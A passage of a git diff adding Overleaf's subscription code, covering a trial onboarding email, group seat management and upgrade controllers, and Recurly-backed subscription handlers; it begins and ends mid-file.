symbolPalette = EmailMessageHelper.displayLink( + 'Read More', + `${settings.siteUrl}/learn/how-to/Using_the_Symbol_Palette_in_Overleaf#:~:text=To%20open%20the%20Symbol%20Palette,the%20handle%20up%20and%20down.`, + isPlainText + ) + const latexTutorials = EmailMessageHelper.displayLink( + 'Read More', + `${settings.siteUrl}/learn/latex/Learn_LaTeX_in_30_minutes?utm_source=Overleaf&utm_medium=email&utm_campaign=TrialEmail&utm_content=latextutorialslink`, + isPlainText + ) + const knowledgeBase = EmailMessageHelper.displayLink( + 'Read More', + `${settings.siteUrl}/learn?utm_source=Overleaf&utm_medium=email&utm_campaign=TrialEmail&utm_content=learnlink`, + isPlainText + ) + const technicalArticles = EmailMessageHelper.displayLink( + 'Read More', + `${settings.siteUrl}/learn/latex/Articles?utm_source=Overleaf&utm_medium=email&utm_campaign=TrialEmail&utm_content=articleslink`, + isPlainText + ) + const webinars = EmailMessageHelper.displayLink( + 'Read More', + `${settings.siteUrl}/events/webinars?utm_source=Overleaf&utm_medium=email&utm_campaign=TrialEmail&utm_content=webinarslink`, + isPlainText + ) + + const cancel = EmailMessageHelper.displayLink( + 'cancel at any time', + `${settings.siteUrl}/learn/how-to/Canceling_Subscription?utm_source=Overleaf&utm_medium=email&utm_campaign=TrialEmail&utm_content=cancellink`, + isPlainText + ) + + const feedback = EmailMessageHelper.displayLink( + 'hear your feedback', + `https://docs.google.com/forms/d/e/1FAIpQLSfMbbh_z-9-dZ3YnrDCyNpNxFPGA492ZSallKOt8WWp2nx7kg/viewform?usp=sf_link/viewform`, + isPlainText + ) + + const unsubscribe = EmailMessageHelper.displayLink( + 'here', + `${settings.siteUrl}/user/email-preferences`, + isPlainText + ) + + const canInviteMoreNamedCollaborators = + opts.features.collaborators === -1 || + opts.features.collaborators > settings.defaultFeatures.collaborators + + let n = 1 + return [ + `Welcome to your Overleaf Premium Features Trial! We really appreciate your support of Overleaf and are excited for you to use our premium features and get the most out of your trial.`, + `<b>During your trial period, be sure to check out these premium features: </b>`, + + ...(canInviteMoreNamedCollaborators + ? [ + `${n++}. <b>Invite more collaborators</b>: You can now invite named collaborators to your project via the ‘share’ menu in your project (with read-only or edit access). Simply add their email address and an email invitation will be sent to them. You can remove these named collaborators at any time via the same ‘share’ menu.`, + `<ul><li> Inviting Named Collaborators: ${invitingNamedCollaborators}</li></ul>`, + ] + : []), + + `${n++}. <b>Increased compile timeout</b>: You now have more time for compilation (to generate a PDF of your document) before receiving a timeout error message.`, + `<ul><li> Compile Timeout: ${increasedCompileTimeout}</li></ul>`, + + ...(opts.features.trackChanges + ? [ + `${n++}. <b>Real-time track changes</b>: The track changes mode lets you see exactly what has been changed by your collaborators, and allows you to accept or reject each individual change. `, + `<ul><li> Track Changes: ${realTimeTrackChanges}</li></ul>`, + ] + : []), + + `${n++}. <b>Full document history and versioning</b>: View the entire history of your project with the ability to revert to previous versions of your document from your project history (versus only 24 hours of history availability on a free Overleaf account). No more fear of losing work or making changes you can’t undo. `, + `<ul><li> History: ${history}</li> + <li>Versioning: ${versioning}</li></ul>`, + + `${n++}. <b>Advanced reference search</b>: You can search by citation key, and our premium feature allows the added ability to search by author, title, year, or journal.`, + `<ul><li>Advanced Reference Search: ${advancedReferenceSearch}</li></ul>`, + + `${n++}. <b>Reference manager sync </b>: You can link your Mendeley and Zotero accounts to your Overleaf account, allowing you to import your reference library and keep your Overleaf document in sync with the references stored in Mendeley / Zotero.`, + `<ul><li> Reference Manager Sync: ${referenceManagerSync}</li></ul>`, + + `${n++}. <b>Dropbox Sync</b>: You can link your Dropbox account to your Overleaf account, allowing 2-way integration with Dropbox `, + `<ul><li> Dropbox Sync: ${dropboxSync}</li></ul>`, + + `${n++}. <b>Git and GitHub integration</b>: You can configure your Overleaf project to sync directly with a repository on GitHub, or you can use raw git access. This allows you to work offline and sync your files whenever you come back online. You can also use our Overleaf Git Bridge integration, which lets you git clone, push and pull changes between the online Overleaf editor, and your local offline git repository.`, + `<ul><li> Git, GitHub and Git Bridge: ${gitSync}</li></ul>`, + + `${n++}. <b>Symbol Palette</b>: A quick and convenient tool to insert math symbols into your document.`, + `<ul><li> Symbol Palette: ${symbolPalette}</li></ul>`, + + `${n++}. <b>Online tutorials and knowledge base</b>: We have an extensive online knowledge base providing a wide range of platform guidance, LaTeX tutorials, technical articles, and webinars.`, + `<ul><li>LaTeX tutorials: ${latexTutorials}</li> + <li>Knowledge base: ${knowledgeBase}</li> + <li>Technical articles: ${technicalArticles}</li> + <li>Webinars: ${webinars}</li></ul>`, + + `Your trial will last for seven days from when you started it, and you can ${cancel} via your subscription page on your dashboard. If you’d like to continue your subscription after your trial, you’re all set!`, + + `Please let us know if we can provide any additional support or answer any questions - and we’d love to ${feedback}!`, + `Thanks again for supporting Overleaf - Happy TeXing!`, + `The Overleaf Team <hr>`, + + `You're receiving this email because you've recently signed up for an Overleaf premium trial. If you've previously subscribed to emails about product offers and company news and events, you can unsubscribe ${unsubscribe}.`, + ] + }, +}) diff --git a/services/web/app/src/Features/Subscription/SubscriptionEmailHandler.js b/services/web/app/src/Features/Subscription/SubscriptionEmailHandler.js new file mode 100644 index 0000000..c0b32d7 --- /dev/null +++ b/services/web/app/src/Features/Subscription/SubscriptionEmailHandler.js @@ -0,0 +1,29 @@ +const EmailHandler = require('../Email/EmailHandler') +const UserGetter = require('../User/UserGetter') +require('./SubscriptionEmailBuilder') +const PlansLocator = require('./PlansLocator') +const Settings = require('@overleaf/settings') + +const SubscriptionEmailHandler = { + async sendTrialOnboardingEmail(userId, planCode) { + const user = await UserGetter.promises.getUser(userId, { + email: 1, + }) + + const plan = PlansLocator.findLocalPlanInSettings(planCode) + if (!plan) { + throw new Error('unknown paid plan: ' + planCode) + } + if (Settings.enableOnboardingEmails) { + const emailOptions = { + to: user.email, + sendingUser_id: userId, + planName: plan.name, + features: plan.features, + } + await EmailHandler.promises.sendEmail('trialOnboarding', emailOptions) + } + }, +} + +module.exports = SubscriptionEmailHandler diff --git a/services/web/app/src/Features/Subscription/SubscriptionFormatters.js b/services/web/app/src/Features/Subscription/SubscriptionFormatters.js new file mode 100644 index 0000000..1953f33 --- /dev/null +++ b/services/web/app/src/Features/Subscription/SubscriptionFormatters.js @@ -0,0 +1,20 @@ +const dateformat = require('dateformat') + +function formatDateTime(date) { + if (!date) { + return null + } + return dateformat(date, 'mmmm dS, yyyy h:MM TT Z', true) +} + +function formatDate(date) { + if (!date) { + return null + } + return dateformat(date, 'mmmm dS, yyyy', true) +} + +module.exports = { + formatDateTime, + formatDate, +} diff --git a/services/web/app/src/Features/Subscription/SubscriptionGroupController.mjs b/services/web/app/src/Features/Subscription/SubscriptionGroupController.mjs new file mode 100644 index 0000000..14d73f9 --- /dev/null +++ b/services/web/app/src/Features/Subscription/SubscriptionGroupController.mjs @@ -0,0 +1,407 @@ +// ts-check +import SubscriptionGroupHandler from './SubscriptionGroupHandler.js' + +import OError from '@overleaf/o-error' +import logger from '@overleaf/logger' +import SubscriptionLocator from './SubscriptionLocator.js' +import SessionManager from '../Authentication/SessionManager.js' +import UserAuditLogHandler from '../User/UserAuditLogHandler.js' +import { expressify } from '@overleaf/promise-utils' +import Modules from '../../infrastructure/Modules.js' +import UserGetter from '../User/UserGetter.js' +import { Subscription } from '../../models/Subscription.js' +import { isProfessionalGroupPlan } from './PlansHelper.mjs' +import { + MissingBillingInfoError, + ManuallyCollectedError, + PendingChangeError, + InactiveError, + SubtotalLimitExceededError, +} from './Errors.js' +import RecurlyClient from './RecurlyClient.js' + +/** + * @import { Subscription } from "../../../../types/subscription/dashboard/subscription.js" + */ + +/** + * @param {import("express").Request} req + * @param {import("express").Response} res + * @returns {Promise<void>} + */ +async function removeUserFromGroup(req, res) { + const subscription = req.entity + const userToRemoveId = req.params.user_id + const loggedInUserId = SessionManager.getLoggedInUserId(req.session) + const subscriptionId = subscription._id + logger.debug( + { subscriptionId, userToRemoveId }, + 'removing user from group subscription' + ) + + await _removeUserFromGroup(req, res, { + userToRemoveId, + loggedInUserId, + subscription, + }) +} + +/** + * @param {import("express").Request} req + * @param {import("express").Response} res + * @returns {Promise<void>} + */ +async function removeSelfFromGroup(req, res) { + const userToRemoveId = SessionManager.getLoggedInUserId(req.session) + const subscription = await SubscriptionLocator.promises.getSubscription( + req.query.subscriptionId + ) + + await _removeUserFromGroup(req, res, { + userToRemoveId, + loggedInUserId: userToRemoveId, + subscription, + }) +} + +/** + * @param {import("express").Request} req + * @param {import("express").Response} res + * @param {string} userToRemoveId + * @param {string} loggedInUserId + * @param {Subscription} subscription + * @returns {Promise<void>} + * @private + */ +async function _removeUserFromGroup( + req, + res, + { userToRemoveId, loggedInUserId, subscription } +) { + const subscriptionId = subscription._id + + const groupSSOActive = ( + await Modules.promises.hooks.fire('hasGroupSSOEnabled', subscription) + )?.[0] + if (groupSSOActive) { + await Modules.promises.hooks.fire( + 'unlinkUserFromGroupSSO', + userToRemoveId, + subscriptionId + ) + } + + try { + await UserAuditLogHandler.promises.addEntry( + userToRemoveId, + 'remove-from-group-subscription', + loggedInUserId, + req.ip, + { subscriptionId } + ) + } catch (auditLogError) { + throw OError.tag(auditLogError, 'error adding audit log entry', { + userToRemoveId, + subscriptionId, + }) + } + + try { + await SubscriptionGroupHandler.promises.removeUserFromGroup( + subscriptionId, + userToRemoveId + ) + } catch (error) { + logger.err( + { err: error, userToRemoveId, subscriptionId }, + 'error removing self from group' + ) + return res.sendStatus(500) + } + + res.sendStatus(200) +} + +/** + * @param {import("express").Request} req + * @param {import("express").Response} res + * @returns {Promise<void>} + */ +async function addSeatsToGroupSubscription(req, res) { + try { + const userId = SessionManager.getLoggedInUserId(req.session) + const { subscription, recurlySubscription, plan } = + await SubscriptionGroupHandler.promises.getUsersGroupSubscriptionDetails( + userId + ) + await SubscriptionGroupHandler.promises.ensureFlexibleLicensingEnabled(plan) + await SubscriptionGroupHandler.promises.ensureSubscriptionCollectionMethodIsNotManual( + recurlySubscription + ) + await SubscriptionGroupHandler.promises.ensureSubscriptionHasNoPendingChanges( + recurlySubscription + ) + // Check if the user has missing billing details + await RecurlyClient.promises.getPaymentMethod(userId) + await SubscriptionGroupHandler.promises.ensureSubscriptionIsActive( + subscription + ) + + res.render('subscriptions/add-seats', { + subscriptionId: subscription._id, + groupName: subscription.teamName, + totalLicenses: subscription.membersLimit, + isProfessional: isProfessionalGroupPlan(subscription), + }) + } catch (error) { + if (error instanceof MissingBillingInfoError) { + return res.redirect( + '/user/subscription/group/missing-billing-information' + ) + } + + if (error instanceof ManuallyCollectedError) { + return res.redirect( + '/user/subscription/group/manually-collected-subscription' + ) + } + + if (error instanceof PendingChangeError || error instanceof InactiveError) { + return res.redirect('/user/subscription') + } + + logger.err( + { error }, + 'error while getting users group subscription details' + ) + + return res.redirect('/user/subscription') + } +} + +/** + * @param {import("express").Request} req + * @param {import("express").Response} res + * @returns {Promise<void>} + */ +async function previewAddSeatsSubscriptionChange(req, res) { + try { + const userId = SessionManager.getLoggedInUserId(req.session) + const preview = + await SubscriptionGroupHandler.promises.previewAddSeatsSubscriptionChange( + userId, + req.body.adding + ) + + res.json(preview) + } catch (error) { + if ( + error instanceof MissingBillingInfoError || + error instanceof ManuallyCollectedError || + error instanceof PendingChangeError || + error instanceof InactiveError + ) { + return res.status(422).end() + } + + if (error instanceof SubtotalLimitExceededError) { + return res.status(422).json({ + code: 'subtotal_limit_exceeded', + adding: req.body.adding, + }) + } + + logger.err( + { error }, + 'error trying to preview "add seats" subscription change' + ) + + return res.status(500).end() + } +} + +/** + * @param {import("express").Request} req + * @param {import("express").Response} res + * @returns {Promise<void>} + */ +async function createAddSeatsSubscriptionChange(req, res) { + try { + const userId = SessionManager.getLoggedInUserId(req.session) + const create = + await SubscriptionGroupHandler.promises.createAddSeatsSubscriptionChange( + userId, + req.body.adding + ) + + res.json(create) + } catch (error) { + if ( + error instanceof MissingBillingInfoError || + error instanceof ManuallyCollectedError || + error instanceof PendingChangeError || + error instanceof InactiveError + ) { + return res.status(422).end() + } + + if (error instanceof SubtotalLimitExceededError) { + return res.status(422).json({ + code: 'subtotal_limit_exceeded', + adding: req.body.adding, + }) + } + + logger.err( + { error }, + 'error trying to create "add seats" subscription change' + ) + + return res.status(500).end() + } +} + +async function submitForm(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const userEmail = await UserGetter.promises.getUserEmail(userId) + const { adding } = req.body + + const messageLines = [`\n**Overleaf Sales Contact Form:**`] + messageLines.push('**Subject:** Self-Serve Group User Increase Request') + messageLines.push(`**Estimated Number of Users:** ${adding}`) + messageLines.push( + `**Message:** This email has been generated on behalf of user with email **${userEmail}** ` + + 'to request an increase in the total number of users for their subscription.' + ) + const messageFormatted = messageLines.join('\n\n') + + const data = { + email: userEmail, + subject: 'Sales Contact Form', + message: messageFormatted, + inbox: 'sales', + } + + await Modules.promises.hooks.fire('sendSupportRequest', data) + res.sendStatus(204) +} + +async function subscriptionUpgradePage(req, res) { + try { + const userId = SessionManager.getLoggedInUserId(req.session) + const changePreview = + await SubscriptionGroupHandler.promises.getGroupPlanUpgradePreview(userId) + const olSubscription = await Subscription.findOne({ + admin_id: userId, + }).exec() + res.render('subscriptions/upgrade-group-subscription-react', { + changePreview, + totalLicenses: olSubscription.membersLimit, + groupName: olSubscription.teamName, + }) + } catch (error) { + if (error instanceof MissingBillingInfoError) { + return res.redirect( + '/user/subscription/group/missing-billing-information' + ) + } + + if (error instanceof ManuallyCollectedError) { + return res.redirect( + '/user/subscription/group/manually-collected-subscription' + ) + } + + if (error instanceof SubtotalLimitExceededError) { + return res.redirect('/user/subscription/group/subtotal-limit-exceeded') + } + + if (error instanceof PendingChangeError || error instanceof InactiveError) { + return res.redirect('/user/subscription') + } + + logger.err({ error }, 'error loading upgrade subscription page') + + return res.redirect('/user/subscription') + } +} + +async function upgradeSubscription(req, res) { + try { + const userId = SessionManager.getLoggedInUserId(req.session) + await SubscriptionGroupHandler.promises.upgradeGroupPlan(userId) + return res.sendStatus(200) + } catch (error) { + logger.err({ error }, 'error trying to upgrade subscription') + return res.sendStatus(500) + } +} + +async function missingBillingInformation(req, res) { + try { + const userId = SessionManager.getLoggedInUserId(req.session) + const subscription = + await SubscriptionLocator.promises.getUsersSubscription(userId) + + res.render('subscriptions/missing-billing-information', { + groupName: subscription.teamName, + }) + } catch (error) { + logger.err( + { error }, + 'error trying to render missing billing information page' + ) + return res.render('/user/subscription') + } +} + +async function manuallyCollectedSubscription(req, res) { + try { + const userId = SessionManager.getLoggedInUserId(req.session) + const subscription = + await SubscriptionLocator.promises.getUsersSubscription(userId) + + res.render('subscriptions/manually-collected-subscription', { + groupName: subscription.teamName, + }) + } catch (error) { + logger.err( + { error }, + 'error trying to render manually collected subscription page' + ) + return res.render('/user/subscription') + } +} + +async function subtotalLimitExceeded(req, res) { + try { + const userId = SessionManager.getLoggedInUserId(req.session) + const subscription = + await SubscriptionLocator.promises.getUsersSubscription(userId) + + res.render('subscriptions/subtotal-limit-exceeded', { + groupName: subscription.teamName, + }) + } catch (error) { + logger.err({ error }, 'error trying to render subtotal limit exceeded page') + return res.render('/user/subscription') + } +} + +export default { + removeUserFromGroup: expressify(removeUserFromGroup), + removeSelfFromGroup: expressify(removeSelfFromGroup), + addSeatsToGroupSubscription: expressify(addSeatsToGroupSubscription), + submitForm: expressify(submitForm), + previewAddSeatsSubscriptionChange: expressify( + previewAddSeatsSubscriptionChange + ), + createAddSeatsSubscriptionChange: expressify( + createAddSeatsSubscriptionChange + ), + subscriptionUpgradePage: expressify(subscriptionUpgradePage), + upgradeSubscription: expressify(upgradeSubscription), + missingBillingInformation: expressify(missingBillingInformation), + manuallyCollectedSubscription: expressify(manuallyCollectedSubscription), + subtotalLimitExceeded: expressify(subtotalLimitExceeded), +} diff --git a/services/web/app/src/Features/Subscription/SubscriptionGroupHandler.js b/services/web/app/src/Features/Subscription/SubscriptionGroupHandler.js new file mode 100644 index 0000000..b313cb6 --- /dev/null +++ b/services/web/app/src/Features/Subscription/SubscriptionGroupHandler.js @@ -0,0 +1,326 @@ +const { callbackify } = require('util') +const SubscriptionUpdater = require('./SubscriptionUpdater') +const SubscriptionLocator = require('./SubscriptionLocator') +const SubscriptionController = require('./SubscriptionController') +const { Subscription } = require('../../models/Subscription') +const RecurlyClient = require('./RecurlyClient') +const PlansLocator = require('./PlansLocator') +const SubscriptionHandler = require('./SubscriptionHandler') +const GroupPlansData = require('./GroupPlansData') +const { MEMBERS_LIMIT_ADD_ON_CODE } = require('./PaymentProviderEntities') +const { + ManuallyCollectedError, + PendingChangeError, + InactiveError, +} = require('./Errors') + +async function removeUserFromGroup(subscriptionId, userIdToRemove) { + await SubscriptionUpdater.promises.removeUserFromGroup( + subscriptionId, + userIdToRemove + ) +} + +async function replaceUserReferencesInGroups(oldId, newId) { + await Subscription.updateOne({ admin_id: oldId }, { admin_id: newId }).exec() + + await _replaceInArray(Subscription, 'manager_ids', oldId, newId) + await _replaceInArray(Subscription, 'member_ids', oldId, newId) +} + +async function isUserPartOfGroup(userId, subscriptionId) { + const subscription = + await SubscriptionLocator.promises.getSubscriptionByMemberIdAndId( + userId, + subscriptionId + ) + + return !!subscription +} + +async function getTotalConfirmedUsersInGroup(subscriptionId) { + const subscription = + await SubscriptionLocator.promises.getSubscription(subscriptionId) + + return subscription?.member_ids?.length +} + +async function _replaceInArray(model, property, oldValue, newValue) { + // Mongo won't let us pull and addToSet in the same query, so do it in + // two. Note we need to add first, since the query is based on the old user. + const query = {} + query[property] = oldValue + + const setNewValue = {} + setNewValue[property] = newValue + + const setOldValue = {} + setOldValue[property] = oldValue + + await model.updateMany(query, { $addToSet: setNewValue }) + await model.updateMany(query, { $pull: setOldValue }) +} + +async function ensureFlexibleLicensingEnabled(plan) { + if (!plan?.canUseFlexibleLicensing) { + throw new Error('The group plan does not support flexible licensing') + } +} + +async function ensureSubscriptionIsActive(subscription) { + if (subscription?.recurlyStatus?.state !== 'active') { + throw new InactiveError('The subscription is not active', { + subscriptionId: subscription._id.toString(), + }) + } +} + +async function ensureSubscriptionCollectionMethodIsNotManual( + recurlySubscription +) { + if (recurlySubscription.isCollectionMethodManual) { + throw new ManuallyCollectedError( + 'This subscription is being collected manually', + { + recurlySubscription_id: recurlySubscription.id, + } + ) + } +} + +async function ensureSubscriptionHasNoPendingChanges(recurlySubscription) { + if (recurlySubscription.pendingChange) { + throw new PendingChangeError('This subscription has a pending change', { + recurlySubscription_id: recurlySubscription.id, + }) + } +} + +async function getUsersGroupSubscriptionDetails(userId) { + const subscription = + await SubscriptionLocator.promises.getUsersSubscription(userId) + + if (!subscription) { + throw new Error('No subscription was found') + } + + if (!subscription.groupPlan) { + throw new Error('User subscription is not a group plan') + } + + const plan = PlansLocator.findLocalPlanInSettings(subscription.planCode) + + const recurlySubscription = await RecurlyClient.promises.getSubscription( + subscription.recurlySubscription_id + ) + + return { + userId, + subscription, + recurlySubscription, + plan, + } +} + +async function _addSeatsSubscriptionChange(userId, adding) { + const { subscription, recurlySubscription, plan } = + await getUsersGroupSubscriptionDetails(userId) + await ensureFlexibleLicensingEnabled(plan) + await ensureSubscriptionIsActive(subscription) + await ensureSubscriptionCollectionMethodIsNotManual(recurlySubscription) + await ensureSubscriptionHasNoPendingChanges(recurlySubscription) + + const currentAddonQuantity = + recurlySubscription.addOns.find( + addOn => addOn.code === MEMBERS_LIMIT_ADD_ON_CODE + )?.quantity ?? 0 + // Keeps only the new total quantity of addon + const nextAddonQuantity = currentAddonQuantity + adding + + let changeRequest + if (recurlySubscription.hasAddOn(MEMBERS_LIMIT_ADD_ON_CODE)) { + // Not providing a custom price as once the subscription is locked + // to an add-on at a given price, it will use it for subsequent payments + changeRequest = recurlySubscription.getRequestForAddOnUpdate( + MEMBERS_LIMIT_ADD_ON_CODE, + nextAddonQuantity + ) + } else { + let unitPrice + const pattern = + /^group_(collaborator|professional)_(2|3|4|5|10|20|50)_(educational|enterprise)$/ + const [, planCode, size, usage] = plan.planCode.match(pattern) + const currency = recurlySubscription.currency + const planPriceInCents = + GroupPlansData[usage][planCode][currency][size].price_in_cents + const legacyUnitPriceInCents = + GroupPlansData[usage][planCode][currency][size] + .additional_license_legacy_price_in_cents + + if ( + _shouldUseLegacyPricing( + recurlySubscription.planPrice, + planPriceInCents / 100, + usage, + size + ) + ) { + unitPrice = legacyUnitPriceInCents / 100 + } + + changeRequest = recurlySubscription.getRequestForAddOnPurchase( + MEMBERS_LIMIT_ADD_ON_CODE, + nextAddonQuantity, + unitPrice + ) + } + + return { + changeRequest, + currentAddonQuantity, + recurlySubscription, + } +} + +function _shouldUseLegacyPricing( + actualPlanPrice, + currentPlanPrice, + usage, + size +) { + // For small educational groups (5 or fewer members) + // 2025 pricing is cheaper than legacy pricing + if (size <= 5 && usage === 'educational') { + return currentPlanPrice < actualPlanPrice + } + + // For all other scenarios + // 2025 pricing is more expensive than legacy pricing + return currentPlanPrice > actualPlanPrice +} + +async function previewAddSeatsSubscriptionChange(userId, adding) { + const { changeRequest, currentAddonQuantity } = + await _addSeatsSubscriptionChange(userId, adding) + const paymentMethod = await RecurlyClient.promises.getPaymentMethod(userId) + const subscriptionChange = + await RecurlyClient.promises.previewSubscriptionChange(changeRequest) + const subscriptionChangePreview = + await SubscriptionController.makeChangePreview( + { + type: 'add-on-update', + addOn: { + code: MEMBERS_LIMIT_ADD_ON_CODE, + quantity: subscriptionChange.nextAddOns.find( + addon => addon.code === MEMBERS_LIMIT_ADD_ON_CODE + ).quantity, + prevQuantity: currentAddonQuantity, + }, + }, + subscriptionChange, + paymentMethod + ) + + return subscriptionChangePreview +} + +async function createAddSeatsSubscriptionChange(userId, adding) { + const { changeRequest, recurlySubscription } = + await _addSeatsSubscriptionChange(userId, adding) + await RecurlyClient.promises.applySubscriptionChangeRequest(changeRequest) + await SubscriptionHandler.promises.syncSubscription( + { uuid: recurlySubscription.id }, + userId + ) + + return { adding } +} + +async function _getUpgradeTargetPlanCodeMaybeThrow(subscription) { + if ( + subscription.planCode.includes('professional') || + !subscription.groupPlan + ) { + throw new Error('Not eligible for group plan upgrade') + } + + return subscription.planCode.replace('collaborator', 'professional') +} + +async function _getGroupPlanUpgradeChangeRequest(ownerId) { + const olSubscription = + await SubscriptionLocator.promises.getUsersSubscription(ownerId) + + await ensureSubscriptionIsActive(olSubscription) + + const newPlanCode = await _getUpgradeTargetPlanCodeMaybeThrow(olSubscription) + const recurlySubscription = await RecurlyClient.promises.getSubscription( + olSubscription.recurlySubscription_id + ) + + await ensureSubscriptionCollectionMethodIsNotManual(recurlySubscription) + await ensureSubscriptionHasNoPendingChanges(recurlySubscription) + + return recurlySubscription.getRequestForGroupPlanUpgrade(newPlanCode) +} + +async function getGroupPlanUpgradePreview(ownerId) { + const changeRequest = await _getGroupPlanUpgradeChangeRequest(ownerId) + const subscriptionChange = + await RecurlyClient.promises.previewSubscriptionChange(changeRequest) + const paymentMethod = await RecurlyClient.promises.getPaymentMethod(ownerId) + return SubscriptionController.makeChangePreview( + { + type: 'group-plan-upgrade', + prevPlan: { + name: SubscriptionController.getPlanNameForDisplay( + subscriptionChange.subscription.planName, + subscriptionChange.subscription.planCode + ), + }, + }, + subscriptionChange, + paymentMethod + ) +} + +async function upgradeGroupPlan(ownerId) { + const changeRequest = await _getGroupPlanUpgradeChangeRequest(ownerId) + await RecurlyClient.promises.applySubscriptionChangeRequest(changeRequest) + await SubscriptionHandler.promises.syncSubscription( + { uuid: changeRequest.subscription.id }, + ownerId + ) +} + +module.exports = { + removeUserFromGroup: callbackify(removeUserFromGroup), + replaceUserReferencesInGroups: callbackify(replaceUserReferencesInGroups), + ensureFlexibleLicensingEnabled: callbackify(ensureFlexibleLicensingEnabled), + ensureSubscriptionIsActive: callbackify(ensureSubscriptionIsActive), + ensureSubscriptionCollectionMethodIsNotManual: callbackify( + ensureSubscriptionCollectionMethodIsNotManual + ), + ensureSubscriptionHasNoPendingChanges: callbackify( + ensureSubscriptionHasNoPendingChanges + ), + getTotalConfirmedUsersInGroup: callbackify(getTotalConfirmedUsersInGroup), + isUserPartOfGroup: callbackify(isUserPartOfGroup), + getGroupPlanUpgradePreview: callbackify(getGroupPlanUpgradePreview), + upgradeGroupPlan: callbackify(upgradeGroupPlan), + promises: { + removeUserFromGroup, + replaceUserReferencesInGroups, + ensureFlexibleLicensingEnabled, + ensureSubscriptionIsActive, + ensureSubscriptionCollectionMethodIsNotManual, + ensureSubscriptionHasNoPendingChanges, + getTotalConfirmedUsersInGroup, + isUserPartOfGroup, + getUsersGroupSubscriptionDetails, + previewAddSeatsSubscriptionChange, + createAddSeatsSubscriptionChange, + getGroupPlanUpgradePreview, + upgradeGroupPlan, + }, +} diff --git a/services/web/app/src/Features/Subscription/SubscriptionHandler.js b/services/web/app/src/Features/Subscription/SubscriptionHandler.js new file mode 100644 index 0000000..f0fdb22 --- /dev/null +++ b/services/web/app/src/Features/Subscription/SubscriptionHandler.js @@ -0,0 +1,459 @@ +// @ts-check + +const recurly = require('recurly') +const RecurlyWrapper = require('./RecurlyWrapper') +const RecurlyClient = require('./RecurlyClient') +const { User } = require('../../models/User') +const logger = require('@overleaf/logger') +const SubscriptionUpdater = require('./SubscriptionUpdater') +const SubscriptionLocator = require('./SubscriptionLocator') +const LimitationsManager = require('./LimitationsManager') +const EmailHandler = require('../Email/EmailHandler') +const { callbackify } = require('@overleaf/promise-utils') +const UserUpdater = require('../User/UserUpdater') +const { NotFoundError } = require('../Errors/Errors') + +/** + * @import { PaymentProviderSubscription, PaymentProviderSubscriptionChange } from './PaymentProviderEntities' + */ + +async function validateNoSubscriptionInRecurly(userId) { + let subscriptions = + await RecurlyWrapper.promises.listAccountActiveSubscriptions(userId) + + if (!subscriptions) { + subscriptions = [] + } + + if (subscriptions.length > 0) { + await SubscriptionUpdater.promises.syncSubscription( + subscriptions[0], + userId + ) + + return false + } + + return true +} + +async function createSubscription(user, subscriptionDetails, recurlyTokenIds) { + const valid = await validateNoSubscriptionInRecurly(user._id) + + if (!valid) { + throw new Error('user already has subscription in recurly') + } + + const recurlySubscription = await RecurlyWrapper.promises.createSubscription( + user, + subscriptionDetails, + recurlyTokenIds + ) + + if (recurlySubscription.trial_started_at) { + const trialStartedAt = new Date(recurlySubscription.trial_started_at) + await UserUpdater.promises.updateUser( + { _id: user._id, lastTrial: { $not: { $gt: trialStartedAt } } }, + { $set: { lastTrial: trialStartedAt } } + ) + } + + await SubscriptionUpdater.promises.syncSubscription( + recurlySubscription, + user._id + ) +} + +/** + * Preview the effect of changing the subscription plan + * + * @param {string} userId + * @param {string} planCode + * @return {Promise<PaymentProviderSubscriptionChange>} + */ +async function previewSubscriptionChange(userId, planCode) { + const subscription = await getSubscriptionForUser(userId) + const changeRequest = subscription?.getRequestForPlanChange(planCode) + const change = + await RecurlyClient.promises.previewSubscriptionChange(changeRequest) + return change +} + +/** + * @param user + * @param planCode + * @param couponCode + */ +async function updateSubscription(user, planCode, couponCode) { + let hasSubscription = false + let subscription + + try { + ;({ hasSubscription, subscription } = + await LimitationsManager.promises.userHasSubscription(user)) + } catch (err) { + logger.warn( + { err, userId: user._id }, + 'there was an error checking user v2 subscription' + ) + } + + if ( + !hasSubscription || + subscription == null || + subscription.recurlySubscription_id == null + ) { + return + } + const recurlySubscriptionId = subscription.recurlySubscription_id + + if (couponCode) { + const usersSubscription = await RecurlyWrapper.promises.getSubscription( + recurlySubscriptionId, + { includeAccount: true } + ) + + await RecurlyWrapper.promises.redeemCoupon( + usersSubscription.account.account_code, + couponCode + ) + } + + const recurlySubscription = await RecurlyClient.promises.getSubscription( + recurlySubscriptionId + ) + const changeRequest = recurlySubscription.getRequestForPlanChange(planCode) + await RecurlyClient.promises.applySubscriptionChangeRequest(changeRequest) + await syncSubscription({ uuid: recurlySubscriptionId }, user._id) +} + +/** + * @param user + */ +async function cancelPendingSubscriptionChange(user) { + const { hasSubscription, subscription } = + await LimitationsManager.promises.userHasSubscription(user) + + if (hasSubscription && subscription != null) { + await RecurlyClient.promises.removeSubscriptionChangeByUuid( + subscription.recurlySubscription_id + ) + } +} + +/** + * @param user + */ +async function cancelSubscription(user) { + try { + const { hasSubscription, subscription } = + await LimitationsManager.promises.userHasSubscription(user) + if (hasSubscription && subscription != null) { + await RecurlyClient.promises.cancelSubscriptionByUuid( + subscription.recurlySubscription_id + ) + await _updateSubscriptionFromRecurly(subscription) + const emailOpts = { + to: user.email, + first_name: user.first_name, + } + const ONE_HOUR_IN_MS = 1000 * 60 * 60 + EmailHandler.sendDeferredEmail( + 'canceledSubscription', + emailOpts, + ONE_HOUR_IN_MS + ) + } + } catch (err) { + logger.warn( + { err, userId: user._id }, + 'there was an error checking user v2 subscription' + ) + } +} + +/** + * @param user + */ +async function reactivateSubscription(user) { + try { + const { hasSubscription, subscription } = + await LimitationsManager.promises.userHasSubscription(user) + if (hasSubscription && subscription != null) { + await RecurlyClient.promises.reactivateSubscriptionByUuid( + subscription.recurlySubscription_id + ) + await _updateSubscriptionFromRecurly(subscription) + EmailHandler.sendEmail( + 'reactivatedSubscription', + { to: user.email }, + err => { + if (err) { + logger.warn( + { err }, + 'failed to send reactivation confirmation email' + ) + } + } + ) + } + } catch (err) { + logger.warn( + { err, userId: user._id }, + 'there was an error checking user v2 subscription' + ) + } +} + +/** + * @param recurlySubscription + * @param requesterData + */ +async function syncSubscription(recurlySubscription, requesterData) { + const storedSubscription = await RecurlyWrapper.promises.getSubscription( + recurlySubscription.uuid, + { includeAccount: true } + ) + + const user = await User.findById(storedSubscription.account.account_code, { + _id: 1, + }).exec() + + if (!user) { + throw new Error('no user found') + } + + await SubscriptionUpdater.promises.syncSubscription( + storedSubscription, + user._id, + requesterData + 